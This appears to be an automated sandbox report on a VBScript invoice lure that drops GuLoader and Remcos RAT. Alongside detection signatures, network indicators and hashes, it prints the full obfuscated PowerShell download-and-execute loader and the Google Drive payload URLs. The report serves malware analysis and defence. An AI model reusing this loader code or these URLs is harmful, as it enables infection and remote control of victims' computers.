Windows Analysis Report
FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs

Overview

General Information

Sample name: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: FAKTURA-P-4526485-2742747722-00043067pdf.vbs
Analysis ID: 1636426
MD5: bcc3425d021c26a5baf855502b0c609b
SHA1: 0b01002803b807210127366afe4c9abff1fd62da
SHA256: 6a2f42008025068bd6943e90e73f473de802e86f6fc5b33cc5958a5e28f9ec56
Tags: vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3940 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 6408 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ 
illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedye B,coM telSkkeoRig gupl yMaso.huldHLateeAfchaCoutd UndeMatrrDia sMira[Dece$SateAPrebr padcBr ghS ikeTranrpokayBown] k a=Ttyf$IndeD .psaUnsctBgeraPrudfPan i.amalStan7,orp9');$Thermoses=Subrogate 'pa t$PrelAModit Ve hNosteForloDimelEct oElitgSygeyStue.StteDSandoGte wSpannMonolSikkoFolkaAdmidFi iF O eiNyphlsyfieStor(Ditt$ totR SameCompaSejosOutpkPort,Bdg,$ urG TeglBaa.oBur,zFor eGibbsSint)';$Glozes=$Styringsafdelingens;Elektriseringers (Subrogate 'Subt$DalegUnculGin,OPo oBAfleaRed.lRewa:SolldVe,iI IndmQuizEFjeltAmnehGadgY ettL.rykbR veEMag nUdd Z cieBeren NyleNick=,adn( dittPatreFritsJgertDiap-VandPDespaBeritCillH dvi In $Jvn.gKum LDisco ronzTatteAnssSSted)');while (!$Dimethylbenzene) {Elektriseringers (Subrogate 'S um$ Lr gUnlilNon.o S obFr.earefelMile:UnprFMonooArtirMorrc MeniCatep KaciNonfaMagllBrat=Dren$Re sn SysoConjni bjiReinn middzi buStrks BintApprrRadiiBr.gaCalclpr.gi.ienzPreee Hydd') ;Elektriseringers $Thermoses;Elektriseringers (Subrogate 'Frsl[ ChoTSidehPlasRP,ssEcrueaAd idOdalI 
FinnSeerGPleu.D ciTAccehObexrDip.EAu iaBru D Spn]Tamp:Maza: ApoSSatcl Bede A,seNu,epPedi(Eksp4Iskl0Pe v0Hard0prec)');Elektriseringers (Subrogate 'Mi.d$ QuigAr nlDirio Skrb Pela FoulUnde:SuppDParaiQuatmAthieJin TPa rhTranyBarklbuncbHundEAmp.N .etz orEKe,inToadESubc=Over( RedTUnfaEt.inSBrgetByra-LogrPTetrASemiT Neuh egt Sco$Forsg TidlCestOFremZRehae Da SGass)') ;Elektriseringers (Subrogate 'Cook$NoneGGrntL,onpoVentbspecaDisclUdgy: Udgk,agtv atrIHem nAreoD.verE dmi= Ele$OrthGAramLRealob,haBP ocaKlasL Amn: cirr andASt vVSavnNUgeniFarmnLevngU.dy+Forr+Auto%Side$SlikaGau sDienpZygoh bagAFabrLN.utTS ksEtalerPoss.Tr sC Lu o PopUtungNUnsot') ;$Reask=$Asphalter[$kvinde]}$Belemringen=344979;$Altsaxer=31350;Elektriseringers (Subrogate ' .id$ A tGForsL D pOPhotBDe.gAForsl E o: Kont NedHU,reiS droUnnuR labEUdtrsTh,aOTo,prEuphc J aI DetNUndeO UnfLAcet Rege=Gran SupeGPante traTUddi-Tro cB owO hjen Ko,tKnale edeNudpoT Sal ,hii$Li egMetalLektO edfZUnprETin S');Elektriseringers (Subrogate 'drue$Uefag Legl Mi oLafgbFo ka InhlWhis:SentEi dokWoodsMentpPlaseDetndOegei Ov t Jugr usteBanenStansEiv Fjsi= rea L ve[ParaSG atySammsFirpt rste Trum Wat.Sh.dC KogoTuranSurvvUnsieHestr Su t Rot]Slip:Unre:TabaFLyserhaemo.ogemPrenB ,oraUnivsMenoeSkuf6Vans4U spSOttetparcrFulniM ssnDes gc,ll(Pree$MinoTSalmhSyntiFal oLater P.leKorasVillo DunrWin cAzt,iUnnena looNed lDyre)');Elektriseringers (Subrogate ' Fus$Ung g KulLHalvOG,beb SkjASemtLOpre:Zo gk UnsV Mg i BagvIn eaSmalLPe.iE ompRIncrEIndrsPerj Coun=S yr Tap [PolysTentyHitssThretFedtE D iM spe. 
KomtAutoEUnexx Ur.TLary.C,roeAgnoNGeomCRaaboBangdIn iibistnUdl gBr k] Int:Bis,:EloxaprskS,osec boniSe eI Reh.Armeg Bl E,ydbt ClaSNympTEpicrAdv iIdioN unnG Me ( s.n$ ksE.plakPionsU.eepJuleE B.uDMa uIDukstKambRS,areBlteN ors L,e)');Elektriseringers (Subrogate ' W.n$HjemG InvLE seoRehob Un AHilsL Kik:fleaoGe aLP eiFSacrENgstr HilT UtrS San= Mo $Pun K IntV.issi KrlvSputAPeraLHilleIndeRAss,EFo.ss til.b nbSRefoUConsBfasts raT frsrSvumICephNphenG Fis(P.rr$D spBAvisE nelGloeEMycemDataRGe tiO poNforsgOrthETelenLeds,lysk$.ortaBorgLF skTAntisDeonAVentXgoa E NonR U.h)');Elektriseringers $Olferts;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 1232 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [same obfuscated script argument as PID 6648] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1100 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2880 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author
0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security

              Source | Rule | Description | Author | Strings
              amsi64_6648.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
              amsi64_6648.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xfc8d:$b2: ::FromBase64String(
              • 0xd012:$s1: -join
              • 0x67be:$s4: +=
              • 0x6880:$s4: +=
              • 0xaaa7:$s4: +=
              • 0xcbc4:$s4: +=
              • 0xceae:$s4: +=
              • 0xcff4:$s4: +=
              • 0xf391:$s4: +=
              • 0xf411:$s4: +=
              • 0xf4d7:$s4: +=
              • 0xf557:$s4: +=
              • 0xf72d:$s4: +=
              • 0xf7b1:$s4: +=
              • 0xd82b:$e4: Get-WmiObject
              • 0xda1a:$e4: Get-Process
              • 0xda72:$e4: Start-Process
              amsi32_1232.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xa81f:$b2: ::FromBase64String(
              • 0x98aa:$s1: -join
              • 0x3056:$s4: +=
              • 0x3118:$s4: +=
              • 0x733f:$s4: +=
              • 0x945c:$s4: +=
              • 0x9746:$s4: +=
              • 0x988c:$s4: +=
              • 0x13c6a:$s4: +=
              • 0x13cea:$s4: +=
              • 0x13db0:$s4: +=
              • 0x13e30:$s4: +=
              • 0x14006:$s4: +=
              • 0x1408a:$s4: +=
              • 0xa0c3:$e4: Get-WmiObject
              • 0xa2b2:$e4: Get-Process
              • 0xa30a:$e4: Start-Process
              • 0x148ed:$e4: Get-Process

              System Summary

              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", ProcessId: 3940, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1100, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49696
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs", ProcessId: 3940, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [same obfuscated script argument as PID 6648, truncated in the report]
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5980, ProcessName: svchost.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-03-12T19:15:16.096593+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49690 | 216.58.206.46 | 443 | TCP
              2025-03-12T19:16:37.070849+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49696 | 216.58.206.46 | 443 | TCP

              AV Detection

              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | Virustotal: Detection: 26%
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs | ReversingLabs: Detection: 26%
              Source: Yara match | File source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49693 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49697 version: TLS 1.2
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.1847691545.000000000295F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1373970474.000002A9B65FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1872980772.00000000071E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1408736409.000002A9CEB10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1 | Host: drive.google.com
              Source: global traffic | HTTP traffic detected: GET /download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download HTTP/1.1 | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49696 -> 216.58.206.46:443
              Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49690 -> 216.58.206.46:443
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: svchost.exe, 00000006.00000002.2260406783.000001EDAE000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/edmond1
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1134990288.000001DD36D60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b6d7482104a72
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabc
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
              Source: wscript.exe, 00000000.00000003.1133636305.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1134739405.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1133061765.000001DD34F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b6d7482104
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B66D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.1851737604.0000000004716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B7DC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyRP
              Source: powershell.exe, 0000000D.00000002.1851737604.0000000004866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16snv_95w0nE4LRQifbdrShuJP1XqvVyRXR
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16snv_95w0nE4LRQifbdrShuJP1XqvVyR&export=download
              Source: msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1qn-VSpMWtzZdS5Rb24PoeniKIYvhDYjX&export=download
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 00000006.00000003.1208404396.000001EDADD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B68F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
